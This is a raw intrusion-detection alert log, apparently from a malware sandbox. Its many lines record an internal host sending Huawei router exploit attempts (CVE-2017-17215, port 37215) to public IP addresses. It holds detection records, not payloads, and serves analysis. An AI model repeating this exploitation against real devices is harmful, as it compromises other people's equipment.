                                                    07/10/24-08:27:33.857818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3848837215192.168.2.14157.57.86.59
                                                    07/10/24-08:27:05.207255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065637215192.168.2.1441.190.27.30
                                                    07/10/24-08:26:15.881416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6020837215192.168.2.1486.132.26.226
                                                    07/10/24-08:26:14.757846TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6043237215192.168.2.14197.242.190.51
                                                    07/10/24-08:26:34.201390TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5187237215192.168.2.1441.84.154.164
                                                    07/10/24-08:26:45.639847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5612237215192.168.2.14157.3.252.8
                                                    07/10/24-08:27:13.761969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470637215192.168.2.14197.127.95.10
                                                    07/10/24-08:27:13.880072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473637215192.168.2.14166.16.236.45
                                                    07/10/24-08:26:55.297607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348637215192.168.2.14197.72.183.154
                                                    07/10/24-08:27:07.276755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827837215192.168.2.14197.252.127.150
                                                    07/10/24-08:27:31.559340TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4900437215192.168.2.14197.169.148.206
                                                    07/10/24-08:26:31.060158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5039037215192.168.2.1441.224.20.247
                                                    07/10/24-08:26:36.395697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654437215192.168.2.14171.164.175.35
                                                    07/10/24-08:27:19.193272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4997237215192.168.2.14197.6.171.248
                                                    07/10/24-08:27:33.744023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920037215192.168.2.1441.222.139.67
                                                    07/10/24-08:26:13.758860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973037215192.168.2.14176.12.104.181
                                                    07/10/24-08:26:23.344412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450037215192.168.2.14197.152.13.80
                                                    07/10/24-08:26:38.575059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164037215192.168.2.14157.249.55.71
                                                    07/10/24-08:26:17.971584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3548437215192.168.2.14157.232.5.252
                                                    07/10/24-08:27:17.107652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4203637215192.168.2.14197.54.161.240
                                                    07/10/24-08:27:13.808295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4362237215192.168.2.1441.151.93.131
                                                    07/10/24-08:27:07.390012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575437215192.168.2.14157.210.232.105
                                                    07/10/24-08:26:53.140498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814437215192.168.2.1441.76.11.70
                                                    07/10/24-08:26:53.198368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5223037215192.168.2.14197.155.218.132
                                                    07/10/24-08:27:10.751159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304637215192.168.2.14197.230.64.158
                                                    07/10/24-08:27:24.878346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781237215192.168.2.1441.206.249.51
                                                    07/10/24-08:26:49.805818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828237215192.168.2.14157.154.101.80
                                                    07/10/24-08:26:20.161676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753037215192.168.2.14192.241.120.96
                                                    07/10/24-08:26:42.375701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3453437215192.168.2.1451.153.153.116
                                                    07/10/24-08:27:30.561465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3754037215192.168.2.14223.194.50.187
                                                    07/10/24-08:26:14.735455TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821837215192.168.2.14157.73.160.11
                                                    07/10/24-08:26:14.810948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3974437215192.168.2.14197.116.214.91
                                                    07/10/24-08:26:42.426350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735037215192.168.2.14157.132.70.39
                                                    07/10/24-08:26:17.945424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4512237215192.168.2.14157.90.215.205
                                                    07/10/24-08:26:51.966611TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3748237215192.168.2.1441.96.74.220
                                                    07/10/24-08:26:57.655011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634837215192.168.2.14157.169.55.244
                                                    07/10/24-08:26:23.296739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3459237215192.168.2.1441.220.34.225
                                                    07/10/24-08:26:42.368823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4131037215192.168.2.14197.146.105.2
                                                    07/10/24-08:26:25.519019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4530237215192.168.2.1441.117.143.92
                                                    07/10/24-08:26:42.432060TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3500837215192.168.2.14157.79.79.179
                                                    07/10/24-08:26:42.409730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3619837215192.168.2.14117.139.96.66
                                                    07/10/24-08:27:27.094763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727037215192.168.2.1441.36.187.180
                                                    07/10/24-08:26:17.962280TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385637215192.168.2.1412.77.187.2
                                                    07/10/24-08:27:20.460013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287837215192.168.2.14197.54.110.129
                                                    07/10/24-08:27:22.573004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800637215192.168.2.14197.200.237.30
                                                    07/10/24-08:27:19.259031TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4810037215192.168.2.14157.77.145.138
                                                    07/10/24-08:26:23.309785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4823637215192.168.2.14157.118.176.138
                                                    07/10/24-08:27:10.739922TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003637215192.168.2.1441.185.219.248
                                                    07/10/24-08:26:53.177973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4339037215192.168.2.14135.166.56.138
                                                    07/10/24-08:26:57.650013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4960637215192.168.2.14197.136.67.76
                                                    07/10/24-08:27:22.573004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3854837215192.168.2.1441.71.107.130
                                                    07/10/24-08:27:31.533375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558637215192.168.2.14186.0.14.192
                                                    07/10/24-08:26:42.341991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3878637215192.168.2.1462.157.21.180
                                                    07/10/24-08:26:43.842656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4570237215192.168.2.1472.165.73.60
                                                    07/10/24-08:26:18.011298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857037215192.168.2.1441.25.80.59
                                                    07/10/24-08:26:28.821569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3509437215192.168.2.1441.116.111.61
                                                    07/10/24-08:26:49.844919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3924837215192.168.2.1441.136.49.62
                                                    07/10/24-08:26:38.584651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3981837215192.168.2.1441.78.40.111
                                                    07/10/24-08:27:16.994273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380837215192.168.2.1441.23.12.17
                                                    07/10/24-08:26:11.129630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102037215192.168.2.1441.196.126.1
                                                    07/10/24-08:26:53.158324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3588837215192.168.2.1441.217.127.40
                                                    07/10/24-08:27:23.501792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053037215192.168.2.1441.122.37.215
                                                    07/10/24-08:26:29.817860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832237215192.168.2.14157.142.7.213
                                                    07/10/24-08:27:07.342964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5269037215192.168.2.1441.89.185.39
                                                    07/10/24-08:27:22.930500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5781837215192.168.2.1441.229.175.143
                                                    07/10/24-08:26:47.948537TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553637215192.168.2.1441.94.117.125
                                                    07/10/24-08:27:22.562470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507437215192.168.2.14188.90.4.189
                                                    07/10/24-08:27:11.564207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362837215192.168.2.14197.189.200.39
                                                    07/10/24-08:26:11.604803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396437215192.168.2.14157.74.64.134
                                                    07/10/24-08:26:49.777925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6064437215192.168.2.14157.30.144.150
                                                    07/10/24-08:26:52.001475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4353637215192.168.2.14157.153.227.49
                                                    07/10/24-08:27:02.872496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4726037215192.168.2.14157.127.217.116
                                                    07/10/24-08:27:14.875328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583637215192.168.2.14197.100.12.175
                                                    07/10/24-08:26:59.754191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3303637215192.168.2.14197.82.232.245
                                                    07/10/24-08:26:23.353387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321637215192.168.2.14157.80.133.70
                                                    07/10/24-08:27:10.772266TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3444437215192.168.2.1469.115.193.55
                                                    07/10/24-08:27:14.827269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5888637215192.168.2.14157.166.35.216
                                                    07/10/24-08:27:05.081502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4163437215192.168.2.14139.138.160.68
                                                    07/10/24-08:27:28.089956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5426437215192.168.2.1441.210.98.239
                                                    07/10/24-08:26:25.485582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4367437215192.168.2.14197.37.74.220
                                                    07/10/24-08:27:05.195980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5172237215192.168.2.14157.168.169.223
                                                    07/10/24-08:26:57.586021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5927237215192.168.2.1441.134.98.229
                                                    07/10/24-08:26:51.979594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099437215192.168.2.1441.147.164.26
                                                    07/10/24-08:26:57.662129TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131037215192.168.2.14197.223.2.184
                                                    07/10/24-08:26:59.811678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319037215192.168.2.1441.69.66.136
                                                    07/10/24-08:26:13.652301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5515237215192.168.2.144.45.92.173
                                                    07/10/24-08:26:17.951496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4526437215192.168.2.14157.52.104.164
                                                    07/10/24-08:26:34.257724TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3366037215192.168.2.14197.124.8.12
                                                    07/10/24-08:26:28.642982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4181837215192.168.2.1441.211.67.110
                                                    07/10/24-08:26:36.310661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955437215192.168.2.14197.116.52.30
                                                    07/10/24-08:27:33.901645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473037215192.168.2.14174.112.238.252
                                                    07/10/24-08:27:14.803145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360637215192.168.2.14157.162.191.79
                                                    07/10/24-08:26:25.423394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5164637215192.168.2.14157.44.184.157
                                                    07/10/24-08:26:26.513484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4794837215192.168.2.14157.192.155.103
                                                    07/10/24-08:26:14.828942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037437215192.168.2.14197.45.123.204
                                                    07/10/24-08:26:49.789175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4441037215192.168.2.14157.176.17.116
                                                    07/10/24-08:26:31.071097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4955837215192.168.2.14197.94.109.202
                                                    07/10/24-08:26:13.657783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777437215192.168.2.14197.21.88.223
                                                    07/10/24-08:26:26.437789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5037437215192.168.2.14157.214.222.223
                                                    07/10/24-08:26:25.454697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308637215192.168.2.14157.169.191.30
                                                    07/10/24-08:26:57.637421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540037215192.168.2.14157.59.177.248
                                                    07/10/24-08:27:10.617808TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5261237215192.168.2.1441.145.219.253
                                                    07/10/24-08:26:29.887676TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282037215192.168.2.14194.109.20.119
                                                    07/10/24-08:27:32.507738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570037215192.168.2.1441.108.81.201
                                                    07/10/24-08:27:11.480663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731437215192.168.2.14157.227.86.221
                                                    07/10/24-08:27:08.397659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940637215192.168.2.14136.59.150.139
                                                    07/10/24-08:27:30.483664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5025237215192.168.2.14197.211.65.49
                                                    07/10/24-08:26:49.789652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516037215192.168.2.14157.251.180.151
                                                    07/10/24-08:27:02.702114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3593637215192.168.2.1467.9.245.175
                                                    07/10/24-08:27:13.915007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360037215192.168.2.14197.215.134.197
                                                    07/10/24-08:26:28.906271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4353237215192.168.2.14106.9.219.154
                                                    07/10/24-08:26:53.210385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604237215192.168.2.14157.246.67.155
                                                    07/10/24-08:27:23.494630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5947837215192.168.2.14197.170.254.10
                                                    07/10/24-08:26:34.208833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5907237215192.168.2.14157.14.120.139
                                                    07/10/24-08:27:02.743093TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894037215192.168.2.1441.13.13.181
                                                    07/10/24-08:26:57.649894TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854437215192.168.2.14147.135.178.184
                                                    07/10/24-08:26:28.739642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311637215192.168.2.14197.20.155.142
                                                    07/10/24-08:27:31.446211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226437215192.168.2.14157.177.12.162
                                                    07/10/24-08:26:36.365413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5264037215192.168.2.1441.184.44.248
                                                    07/10/24-08:26:28.808876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4775437215192.168.2.14157.160.40.196
                                                    07/10/24-08:26:13.783788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832037215192.168.2.14157.74.13.114
                                                    07/10/24-08:26:33.204295TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5000237215192.168.2.14197.125.28.49
                                                    07/10/24-08:26:49.858364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706237215192.168.2.14157.209.242.210
                                                    07/10/24-08:27:10.595004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503837215192.168.2.14197.121.221.42
                                                    07/10/24-08:26:23.322732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339237215192.168.2.1441.151.210.230
                                                    07/10/24-08:26:59.542620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5359437215192.168.2.1441.45.189.249
                                                    07/10/24-08:26:11.628509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4239037215192.168.2.14197.138.107.31
                                                    07/10/24-08:26:49.850341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5076037215192.168.2.14157.164.10.242
                                                    07/10/24-08:26:34.257724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816437215192.168.2.14157.97.100.157
                                                    07/10/24-08:26:51.949287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4299237215192.168.2.1441.156.140.180
                                                    07/10/24-08:26:31.069487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039037215192.168.2.14197.17.204.210
                                                    07/10/24-08:27:05.222461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430237215192.168.2.1441.68.54.58
                                                    07/10/24-08:27:33.952694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3648437215192.168.2.1441.81.30.216
                                                    07/10/24-08:27:02.876445TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5189237215192.168.2.14197.181.76.2
                                                    07/10/24-08:26:59.718757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4637837215192.168.2.1441.5.74.81
                                                    07/10/24-08:26:25.523012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4807237215192.168.2.14197.8.235.127
                                                    07/10/24-08:26:14.828037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726437215192.168.2.1441.37.166.86
                                                    07/10/24-08:26:17.986664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5723637215192.168.2.1441.253.58.119
                                                    07/10/24-08:26:55.470816TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842237215192.168.2.14120.69.87.76
                                                    07/10/24-08:27:19.166919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3617037215192.168.2.14157.233.50.112
                                                    07/10/24-08:26:51.945867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5874437215192.168.2.14197.123.110.163
                                                    07/10/24-08:26:28.798195TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5785237215192.168.2.1441.80.192.25
                                                    07/10/24-08:27:33.943279TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214237215192.168.2.1434.147.125.194
                                                    07/10/24-08:26:11.176573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4623837215192.168.2.14197.45.163.77
                                                    07/10/24-08:26:11.506758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5132037215192.168.2.1441.149.109.197
                                                    07/10/24-08:26:28.853049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829837215192.168.2.1441.121.231.134
                                                    07/10/24-08:26:53.171855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5674637215192.168.2.14151.48.236.119
                                                    07/10/24-08:27:33.840448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5510237215192.168.2.14197.231.224.209
                                                    07/10/24-08:26:11.659396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3425837215192.168.2.14157.174.22.12
                                                    07/10/24-08:26:41.406016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3298237215192.168.2.14157.85.249.161
                                                    07/10/24-08:26:59.776063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486037215192.168.2.14197.22.204.143
                                                    07/10/24-08:26:15.881754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828637215192.168.2.14157.65.4.126
                                                    07/10/24-08:26:52.040110TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3361637215192.168.2.14157.241.114.137
                                                    07/10/24-08:27:08.417840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4974437215192.168.2.14197.169.255.172
                                                    07/10/24-08:26:57.631188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5991237215192.168.2.1441.66.226.120
                                                    07/10/24-08:27:14.846154TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4452637215192.168.2.14197.213.138.238
                                                    07/10/24-08:26:57.580617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355637215192.168.2.14184.208.243.255
                                                    07/10/24-08:27:02.989706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4407437215192.168.2.1441.13.23.182
                                                    07/10/24-08:27:13.829336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5273037215192.168.2.14128.95.165.93
                                                    07/10/24-08:26:55.277913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518237215192.168.2.14167.248.125.181
                                                    07/10/24-08:26:34.251063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3916837215192.168.2.1441.163.218.228
                                                    07/10/24-08:26:36.377315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996837215192.168.2.1485.83.183.41
                                                    07/10/24-08:26:57.661675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4029837215192.168.2.1463.251.96.67
                                                    07/10/24-08:26:38.569850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4241237215192.168.2.1441.221.80.152
                                                    07/10/24-08:27:24.901081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315037215192.168.2.14133.148.214.21
                                                    07/10/24-08:27:22.874012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457037215192.168.2.14157.216.17.220
                                                    07/10/24-08:26:20.179402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3489437215192.168.2.14157.76.10.110
                                                    07/10/24-08:27:33.862601TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3868037215192.168.2.14197.191.97.96
                                                    07/10/24-08:26:23.328936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4176837215192.168.2.14197.135.20.169
                                                    07/10/24-08:26:41.352222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5852637215192.168.2.14197.122.174.153
                                                    07/10/24-08:26:34.211493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342437215192.168.2.1441.57.231.65
                                                    07/10/24-08:26:42.381146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760637215192.168.2.14158.241.168.5
                                                    07/10/24-08:26:11.190243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5240437215192.168.2.14157.135.80.174
                                                    07/10/24-08:27:23.831762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4093237215192.168.2.14197.114.43.24
                                                    07/10/24-08:27:27.138441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6075837215192.168.2.1441.43.119.126
                                                    07/10/24-08:27:32.569542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026037215192.168.2.14197.162.238.254
                                                    07/10/24-08:26:28.875579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951237215192.168.2.1466.168.140.88
                                                    07/10/24-08:26:49.827119TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870237215192.168.2.14157.3.39.64
                                                    07/10/24-08:27:28.174408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784837215192.168.2.14157.39.25.112
                                                    07/10/24-08:26:29.873958TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4427037215192.168.2.1494.62.243.13
                                                    07/10/24-08:26:59.652342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3908437215192.168.2.1441.37.93.194
                                                    07/10/24-08:26:23.313392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926237215192.168.2.14197.109.39.149
                                                    07/10/24-08:26:36.310661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5973837215192.168.2.1441.62.200.48
                                                    07/10/24-08:26:34.194125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5774037215192.168.2.14128.101.131.138
                                                    07/10/24-08:26:45.604198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239437215192.168.2.1441.12.183.49
                                                    07/10/24-08:26:29.871323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4015437215192.168.2.14104.57.46.88
